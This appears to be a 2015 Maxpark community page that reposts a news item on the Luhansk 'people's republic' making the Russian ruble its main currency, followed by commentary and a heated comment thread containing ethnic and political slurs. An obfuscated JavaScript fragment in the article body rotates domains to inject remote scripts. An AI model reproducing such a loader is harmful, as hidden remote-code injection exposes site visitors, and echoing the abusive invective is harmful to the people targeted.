Войти в аккаунт
Хотите наслаждаться полной версией, а также получить неограниченный доступ ко всем материалам?

Реальная Беларусь

Сообщество 2887 участников
Заявка на добавление в друзья

ЛНР образовала валютный союз с Россией. А Россия знает ?

В ЛНР решили сделать российский рубль основной валютой

Совет министров ЛНР издал постановление, согласно которому российский рубль станет основной валютой самопровозглашенной республики уже с 1 сентября. Сообщение об этом появилось на страницах «ЛуганскИнформЦентра», там же можно скачать текст официального документа.

«В целях принятия мер по стабилизации финансово-денежной системы, а также в связи с осуществлением финансовых операций на территории Луганской народной республики преимущественно в российских рублях и резким снижением гривневой наличной денежной массы (…) установить, что основной денежной единицей на территории ЛНР является российский рубль», — говорится в тексте постановления.

Документом предписывается перерасчет выплат заработной платы работникам бюджетной сферы и тарифов на жилищно-коммунальные услуги, а также осуществление в новой валюте бюджетного планирования, финансовой и налоговой отчетности.

Население в Луганске, как и везде, хочет на саночках спускаться только вниз
 
Каковы перспективы выдачи российских документов жителям Донбасса

26 февраля глава ЛНР Игорь Плотницкий своим решением ввел на подконтрольной территории мультивалютную финансовую систему расчетов. Он подчеркнул, что на территории ЛНР в обращении будут находиться рубль, гривна идоллар, а также те валюты, которые «будут удобными».

В Луганске тоже есть золотая молодежь, рестораны, бассейны. Дочь замначМЧС

22 января появилась информация о том, что на заседании правительства Севастополя были продемонстрированы образцы новых денег самопровозглашенных Луганской и Донецкой народных республик. Отмечалось, что была предоставлена купюра в 25 «расчетных знаков Новороссии», которая будет действовать до формирования в ЛНР и ДНР настоящей денежной системы.

В то же время руководство ДНР и ЛНР несколько раз меняло свое мнение по вопросу введения собственной валюты. Так, в начале декабря прошлого года Плотницкий заявлял, что ЛНР продолжит осуществлять расчеты в гривнах. В ДНР в 2014 году говорили о планах создания собственной валюты, однако позднее там назвали такую идею аферой

---------------

Н.П. Стран без валюты и бюджета не бывает. Метания с валютой у НР-цев - свидетельство того, что не собирались они строить "государства".

Но воспитатель этого детского садика сказал, что "еще не время". И надо создать видимость построения "государств". И эти урюки, достаточно хорошо осваивая российские милитари-деньги (черный нал), более года не могут выстроить у себя ни банковской системы, ни бюджетной. Все другие валюты, кроме российского рубля, они не могли перечислять безналично в принципе. Переход только на RUB такую возможность дает. Но при двух условиях:

- Россия еще раз плюнет на ООН и откроет там филиалы своих банков;

- ей придется открыть не только военный, но и гражданский бюджет для НР-в;

Фактически наступил новый этап гибридной войны - Путин оформляет инкорпорацию Донбасса. Пока только экономически. С огромными затратами для России.  Видимо - с ужесточением западных санкций

<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>

Источник: lenta.ru
Загружается, подождите ...
{{ rating.votes_against }} {{ rating.rating }} {{ rating.votes_for }}

Комментировать

осталось 1800 символов
Свернуть комментарии

Все комментарии (43)

Александр Яковенко

комментирует материал 22.08.2015 #

Будет как в Абхазии!
Украина своего добилась - Донбасс ни при каких обстоятельствах не будет уже украинским!

no avatar
Мiкалай Паддубiцкi

отвечает Александр Яковенко на комментарий 22.08.2015 #

Я согласен, что конфликт - на десятилетия.
А как они жить будут ?

no avatar
Александр Яковенко

отвечает Мiкалай Паддубiцкi на комментарий 22.08.2015 #

Будут жить... Но не при нынешней фашистской власти на украине, это главное... А как живёт Абхазия, Ю. Осетия, Приднестровье? Со временем перейдут в состав России (может быть) как Крым...
А угля для жизни и продажи за деньги хватит! А украина? Ну пусть покупает, если ей - банкроту, захотят продать, уголь в ЮАР, в Австралии... Смешные!

no avatar
Мiкалай Паддубiцкi

отвечает Александр Яковенко на комментарий 22.08.2015 #

Что бы долго не спорить.
А что мешает сегодня платить пенсии, если уголь есть ?
ЮО и Абхазия ведь просто выживают. Правда, там нет промышленности, как в Донбассе. Такая судьба вряд ли цель террористов Донбасса

no avatar
Света Иванова

отвечает Мiкалай Паддубiцкi на комментарий 22.08.2015 #

Поправка! террористы на Донбассе - это укрокаратели! А защищают ю-в Народное ополчение!
Не передёргивайте...

no avatar
Эллочка Людоедка

отвечает Света Иванова на комментарий 22.08.2015 #

Хде???На даунбасе?..)))

no avatar
Сергей Андреев

отвечает Света Иванова на комментарий 22.08.2015 #

Террористы в Даунбассе и Лугандонии вот эти: . Если заметили, все Камазы бронированные, их начали выпускать с 2010 года. В каком военторге сепары их купили?

no avatar
Сергей Андреев

отвечает Мiкалай Паддубiцкi на комментарий 22.08.2015 #

Как жить будут? Как в Абхазии:

no avatar
Виталий Закржевский

отвечает Александр Яковенко на комментарий 23.08.2015 #

Александр, скажите какую часть ваших доходов готовы отдавать народам Донбасса, чтобы они стали жить хотя бы так как в Белоруссии? Или у вас в основном вербальная поддержка?

no avatar
Александр Яковенко

отвечает Виталий Закржевский на комментарий 23.08.2015 #

Вам так интересно считать чужие деньги?

no avatar
Виталий Закржевский

отвечает Александр Яковенко на комментарий 24.08.2015 #

Александр, разве я считаю ваши деньги? Я меряю Ваш патриотизм... и как оказывается Вы что то "темните". Я ошибаюсь?

no avatar
Александр Яковенко

отвечает Виталий Закржевский на комментарий 24.08.2015 #

Я не темню... Просто не вижу смысла афишировать в сети свои действия!

no avatar
Виталий Закржевский

отвечает Александр Яковенко на комментарий 24.08.2015 #

Александр, а что скрывать то.... я к примеру готов на нужды ВСУ и Нацгвардии ( исключительно на мирные продукты- медикаменты, продовольствие, тёплые вещи, помощь семьям погибших и искалеченных...) выделять 10% от своего заработка- немного, но это лучше чем ничего. Так что скрывать то нечего. Доброе дело всегда приветствуется.

no avatar
Александр Яковенко

отвечает Виталий Закржевский на комментарий 25.08.2015 #

Я правильно Вас понял, Вы поддерживаете бандеровцев??? И давно Вы отказались от памяти народной Беларуси, забыли Хатынь и сотни других вёсак и хуторов (в одном из них сожгли укроговорящие мрази моих родных)?

no avatar
Виталий Закржевский

отвечает Александр Яковенко на комментарий 25.08.2015 #

Александр, то есть Вы считаете что они не сражаются за свою страну, за свою родину? То есть у них не может быть родины... родина есть только у таких как Вы?
Поясните. Мне непонятно.
К тому же в карательном отряде среди тех кто сжигал Хатынь было много и этнических русских. Вы это знали, или они не в счёт?
А что такое народная Беларусь для Вас как человека который считает Белорусский народ всего то жителями(частью) "Русского мира"?
Честно скажите- придут сюда к нам русские насаждать свой мир- с кем будете:в лес партизанить пойдёте или им самогон и сало подносить?

no avatar
Александр Яковенко

отвечает Виталий Закржевский на комментарий 25.08.2015 #

Повторюсь... Хатынь сжигали те, кого считали потом одним словом - бандеровцы (нынешняя идеологоия украины), а кто - оуновцы, галицаи, бандеровцы, унсовцы... В сортах говна не разбираемся... А русские там были, в отрядах упырей? Грустно... но относительно украинцев мизер...
А по поводу защиты Родины? Так кто звал карателей на Донбасс? Народное ополчение не обстреливает киев (пока), а туда пришли захватчиками именно укрокаратели... ВСУ, и прочие "добровольцы". Повторю свой вопрос - Вы поддерживаете бандерлогов? Про Хатынь забыли?

no avatar
Виталий Закржевский

отвечает Александр Яковенко на комментарий 25.08.2015 #

Александр,Ваш патриотизм делает Вас не объективным.
Россия имеет право карать и уничтожать мятежников посягнувших на конституционный строй России и её территориальную целостность "Градами" и "Ураганами",ковровыми бомбардировками...вместе со стариками,женщинами,детьми,их домами,городами и сёлами.
Украина не имеет право карать за то же самое на своей территории?
Кто привёз негодяев поднявших мятеж в Донбассе,-гражданин России некий Гиркин,о чём он сам неоднократно заявлял!Так кто там защищал Родину и от кого?Гиркин решил что его родина-Украина?С какого такого рожна?
Среди всех национальностей воевавших на стороне Гитлера именно этнические русские были в подавляющем большинстве!Мама рассказывала как во время оккупации на Новгородчине "действовали" ещё недавно бывшие солдаты и офицеры РККА( комсомольцы и коммунисты бывшие!)в рядах Зондер-команд.Были хуже Немцев.Вам это не знакомо?Вы во всём Бандеру,который ни дня не воевал против Советов,обвиняете.Вы поёте с чужих слов,тов. Яковенко,а конкретно со слов гнусной и подлой Кремлёвской пропаганды.Почитайте:http://www.e-reading.club/chapter.php/1025860/15/Zhukov_-_Ohotniki_za_partizanami._Brigada_Dirlevangera.html

no avatar
Robinzon Kruzo

комментирует материал 22.08.2015 #

Возможно, падение нефтяных цен и не на первом месте по степени урона для экономики РФ. Ведь плавный отжим Донбасса явно обходится не дёшево. Скорее всего, даже дороже чем АТО для Украины.

no avatar
Мiкалай Паддубiцкi

отвечает Robinzon Kruzo на комментарий 22.08.2015 #

Немцов насчитал более миллиарда на войну. Финансирование идет четко.
Но если включаться в финансирование гражданки, то это будет в несколько раз больше. Как минимум

no avatar
Феофан Прокопович

отвечает Мiкалай Паддубiцкi на комментарий 22.08.2015 #

Вот только в Украине могут ограничить обмен рубля... Тогда надо будет посылать в ЛНР не только рубли, но и товары, и еду...

no avatar
Мiкалай Паддубiцкi

отвечает Феофан Прокопович на комментарий 22.08.2015 #

Сам по себе рубль не виноват. И Украина с Россией продолжают торговать.
В статье не о "посылать", а о безналичных платежах. Это совсем другое.
Россия подписала Минск-2. Там - об особом статусе Донбасса в Украине. Если Россия откроет в ДНР-ЛНР свои банки без разрешения Украины, то нарушит соглашения.

no avatar
Сергей Андреев

отвечает Мiкалай Паддубiцкi на комментарий 22.08.2015 #

Они даже мост, через Керченский пролив построить не могут, без разрешения стран Черноморской зоны.

no avatar
Феофан Прокопович

комментирует материал 22.08.2015 #

Закончились стыренные в Крыму наличные гривны. А россияне всё "поймут и простят"...

no avatar
Мiкалай Паддубiцкi

отвечает Феофан Прокопович на комментарий 22.08.2015 #

Сумма, на которую надо ежедневно прощать, больно велика. Думаю, что речь о ежегодной сумме в $5 млрд

no avatar
Виталий Закржевский

отвечает Мiкалай Паддубiцкi на комментарий 23.08.2015 #

Николай, это как минимум. Но вот есть более интересный вопрос: Россия из политических соображений станет покупать "независимый" уголь, причём весьма дорогой, куда дороже чем Кузбасский или Ростовский. Что тогда делать с закрывающимися шахтами в Ростовской области? Они на грани рентабельности... а тут ещё и "братскому народу" надо отдать кусок рынка...
Хотя как говориться- Врубай телек- там объяснят. И все махнув рукой согласятся!
Касаемо текущих расходорв.Прикинем:
Допустим что после всех передряг в ДНР и ЛНР примерно 2 млн жителей( не считаем пришлых- они по военному ведомству должны снабжаться!) число иждевенцев примерно колеблется от 20- до 30% из них половина-пенсионеры. Даём им пенсию в 100$х12 мес.х300000=360 млн.$ только пенсий в год.
Бюджетники( а в таких ситуациях они единственные получатели хоть малого но устойчивого дохода- хотя бы в теории!) таких в экономике примерно 10% дадим им тоже 100$х12 мес.х200000=240 млн.$. Итого 600 млн.$ в год только на нищенские зарплаты и пенсии. Вот и считайте.

no avatar
Мiкалай Паддубiцкi

отвечает Виталий Закржевский на комментарий 23.08.2015 #

Сергей статью размещал, что у них много именно пенсионеров. Окорло миллиона. Это уже миллиард.
А вот госсектор за $100 работать не будет.
Учитывайте, что зарплата - только половина госрасходов.
С углем верно. Он дотационный в Украине. Это хоть и оригинально кажется, но Украине проще использовать юаровский, чем донбасский. Правда, на Донбассе много и металлургии. Считать надо в целом.
Меня поражает, что большая война закончилась год назад. Чем же эти совмины, бля, занимаются ?

no avatar
Виталий Закржевский

отвечает Мiкалай Паддубiцкi на комментарий 24.08.2015 #

Николай, а кому там заниматься? Все у кого были в наличии мозги- разбежались.

no avatar
Мiкалай Паддубiцкi

отвечает Виталий Закржевский на комментарий 24.08.2015 #

Скорее всего, их лидеры-пидеры и не ставят целью за народ-за страну. Новая газета пишет, что оставшиеся бизнесы разделили между собой.

no avatar
Виталий Закржевский

отвечает Мiкалай Паддубiцкi на комментарий 24.08.2015 #

Николай, я вообще считаю, что там никто и ни о чём дальше завтрашнего дня не думает.Они уже не видят выхода- Россия ясно что не возьмёт, а идти назад к Хунте...Вот и стоит задача награбить пока есть возможность и удрать в ту же Россию, бросив всё на произвол судьбы.

no avatar
Марина Смирнова

комментирует материал 22.08.2015 #

да собирались они государство строить, но одного желания мало... и в состав России часть войти хотела, тоже обломалось.
Интересно, где они будут брать для расчетов рубли, Россия подкинет?

no avatar
Эллочка Людоедка

отвечает Марина Смирнова на комментарий 22.08.2015 #

Напечатают...))))

no avatar
Мiкалай Паддубiцкi

отвечает Марина Смирнова на комментарий 22.08.2015 #

Россия сегодня полностью финансирует войну и госвласть там. Наличными рублями и гривнями.
Тут же надо
- иметь инфраструктуру (банки)
- иметь выделенный бюджет.
Даже то, что луганцы и донецкие не сговорятся здесь - уже показательно

no avatar
×
Заявите о себе всем пользователям Макспарка!

Заказав эту услугу, Вас смогут все увидеть в блоке "Макспаркеры рекомендуют" - тем самым Вы быстро найдете новых друзей, единомышленников, читателей, партнеров.

Оплата данного размещения производится при помощи Ставок. Каждая купленная ставка позволяет на 1 час разместить рекламу в специальном блоке в правой колонке. В блок попадают три объявления с наибольшим количеством неизрасходованных ставок. По истечении периода в 1 час показа объявления, у него списывается 1 ставка.

Сейчас для мгновенного попадания в этот блок нужно купить 1 ставку.

Цена 10.00 MP
Цена 40.00 MP
Цена 70.00 MP
Цена 120.00 MP
Оплата

К оплате 10.00 MP. У вас на счете 0 MP. Пополнить счет

Войти как пользователь
email
{{ err }}
Password
{{ err }}
captcha
{{ err }}
Обычная pегистрация

Зарегистрированы в Newsland или Maxpark? Войти

email
{{ errors.email_error }}
password
{{ errors.password_error }}
password
{{ errors.confirm_password_error }}
{{ errors.first_name_error }}
{{ errors.last_name_error }}
{{ errors.sex_error }}
{{ errors.birth_date_error }}
{{ errors.agree_to_terms_error }}
Восстановление пароля
email
{{ errors.email }}
Восстановление пароля
Выбор аккаунта

Указанные регистрационные данные повторяются на сайтах Newsland.com и Maxpark.com